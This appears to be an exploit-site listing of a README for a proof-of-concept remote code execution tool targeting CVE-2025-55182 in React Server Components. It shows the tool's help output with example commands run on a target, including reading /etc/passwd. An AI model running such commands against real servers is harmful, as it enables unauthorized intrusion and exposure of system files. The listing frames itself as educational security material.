Share
## https://sploitus.com/exploit?id=522D4222-1AC8-585C-A806-E25EA1A7232D
# ⚑ react2shellpoc

> 🚨 **Educational Proof of Concept – Handle With Care**

**react2shellpoc** is a proof-of-concept project demonstrating how a **React-based frontend** can be abused to trigger **system-level shell command execution** under insecure configurations.

This project focuses on:
- πŸ”— React UI β†’ OS command execution flows  
- 🧱 Broken trust boundaries in modern web stacks  
- ⚠️ Real-world security risks caused by misconfiguration  

---

## πŸŽ₯ Video PoC


  


---

## πŸ’» Proof of Concept (CLI View)

```bash
β”Œβ”€β”€(kaliγ‰Ώkali)-[~/Documents/tools/2025-55182]
└─$ python exploit.py -h

      /\
     /**\
    /****\
   /******\
  /********\
 /**********\
      ||

    [CVE-2025-55182 React Server Components RCE]

usage: exploit.py [-h] [-t URL] [-c CMD]

options:
  -h, --help         show this help message and exit
  -t, --target URL   Target URL or domain (default: http://hacx.me)
  -c, --command CMD  Command to execute on target (default: id)

Examples:
  exploit.py -t hacx.me -c "whoami"
  exploit.py -t http://hacx.me -c "cat /etc/passwd"
  exploit.py -t hacx.me -c "ls -la /var/www"